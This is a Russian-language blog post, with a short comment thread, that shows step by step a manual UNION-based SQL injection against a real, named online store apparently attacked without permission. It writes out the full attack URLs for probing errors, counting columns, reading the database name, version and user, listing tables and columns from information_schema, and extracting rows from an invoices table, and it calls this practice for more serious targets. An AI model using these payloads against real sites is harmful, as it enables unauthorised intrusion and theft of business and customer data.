Взлом сайта (вручную) при помощи уязвимости SQLi. Практический пример.
Листала я сайты значит и наткнулась вот на это чудо.

Не знаю как занесло, но так случилось.. Домен не свежий, защита на нем не очень, ее почти нет. И я подумала, а не запились ли мне пост про то, как ломать сайты и этот довольно не плохо подходит для начала. Он без WAF, и это отлично для понимания азов поиска вебуязвимостей, в данном случае SQLi. Причем делать все будем РУЧКАМИ, ибо нефиг sqlmap, как scriptkiddy юзать ) Да и в целом понять что да как =) Я думаю будет интересно.
Итак, перешла я на данный адрес http://www.teamgear.us/store.php?id=5, тут сразу виден dork php?id=. А что это значит?? Правильно пора проверить код на наличие ошибок, ставим ‘ в конце. И сайт, если у него есть уязвимость, выдаст ошибку. В нашем случае будет так.

Теперь надо определить количество колонок. Я это делаю order by, можно делать union select all и цифры 1,2,3,4….. В нашем случае вышло 15. На видео я покажу, что и как надо делать ) Получился такой запрос http://www.teamgear.us/store.php?id=5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 — –
Теперь, чтобы найти уязвимые колонки, ставим id=-5
http://www.teamgear.us/store.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 — –
И получаем уязвимые колонки 8,5,3.

Так мы можем узнать имя базы, версию и пользователя database(), vrsion(),user()
http://www.teamgear.us/store.php?id=-5 union select 1,2,user(),4,version(),6,7,database(),9,10,11,12,13,14,15 — –

Красиво )) расшарим теперь базу )))
http://www.teamgear.us/store.php?id=-5 union select 1,2,3,4,5,6,7,GROUP_CONCAT(table_name),9,10,11,12,13,14,15 from information_schema.tables where TABLE_schema=database() — –

Еееее, вот вам и invoices =)) продолжим )
http://www.teamgear.us/store.php?id=-5 union select 1,2,3,4,5,6,7,GROUP_CONCAT(column_name),9,10,11,12,13,14,15 from information_schema.columns where TABLE_schema=database() — –

Продолжим .
id,date,description,invoice_num,id,store_id,sku,image,sizes_desc,xsmall,small,medium,large,xlarge,2xlarge,
3xlarge,4xlarge,5xlarge,6xlarge,7xlarge,screened,embroidered,colors,name,description,customizable,price,
uid,store_id,product_sku,color,custom_price,custom_image,id,team_name,team_type,team_mascot,school_name,
address,city,state,zip,cont
Что-то достать мы можем командой
http://www.teamgear.us/store.php?id=-5 union select 1,2,3,4,5,6,7,GROUP_CONCAT(id),9,10,11,12,13,14,15 from invoices — – и так далее )
Мы можем много исследовать на сайте. Но по большому счету интересного здесь мало, и это скорее будет разминка перед более серьезным сайтом )
https://www.youtube.com/watch?v=Lb5zvZKmhV4
Комментарии
Хе-хе, несолько лет назад, со своими "хризантемами", кахда ишшо не знала как кампутер включить, тоже не думала, шо дойду до взлома сайтов и прочей хакерской фигни.)))
Ага, привет слонам передала, он, ответный привет передают.)))